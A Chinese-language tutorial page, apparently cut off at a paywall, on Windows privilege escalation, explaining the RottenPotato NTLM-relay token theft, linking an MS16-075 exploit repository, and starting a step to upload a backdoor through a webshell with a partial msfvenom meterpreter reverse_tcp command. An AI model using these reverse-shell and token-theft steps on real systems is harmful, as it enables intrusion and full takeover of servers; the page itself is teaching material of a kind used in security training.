本文详细介绍了四种Windows系统提权技术,包括利用RottenPotato进行提权、DLL劫持、服务权限配置不当以及不安全的服务路径。通过中间人攻击、DLL劫持、服务路径重定向和不带引号服务路径的漏洞,阐述了如何在不同权限环境下进行提权,涉及msfvenom、meterpreter、incognito等工具的使用。同时,强调了提权的条件和限制,如权限需求、特定软件控制权限等。
思维导图
演示案例:
案例一 Win2012-烂土豆配合令牌窃取提权-Web 权限
单纯令牌窃取:适用于web权限或本地提权
如配合烂土豆提权:适用于web或数据库等权限
提权原理
RottenPotato
RottenPotato(烂土豆)提权的原理可以简述如下:
- 1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。
- 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
- 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户)去反弹meterpreter然后再去执行EXP的时候会失败,但使用菜刀(IIS服务器权限)反弹meterpreter就会成功。即非服务类用户权限无法窃取成功。
烂土豆比热土豆的优点是:
- 1.100%可靠
- 2.(当时)全版本通杀。
- 3.立即生效,不用像hot potato那样有时候需要等Windows更新才能使用。
总之,我对这个的理解是通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。
烂土豆下载资源
windows-kernel-exploits/MS16-075 at master · SecWiki/windows-kernel-exploits (github.com)
烂土豆提权流程
上传烂土豆---------->执行烂土豆---------->利用窃取模块---------->窃取SYSTEM---------->成功
环境
webshell权限
webshell权限
①上传后门
生成一个后门,并上传到目标服务器。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
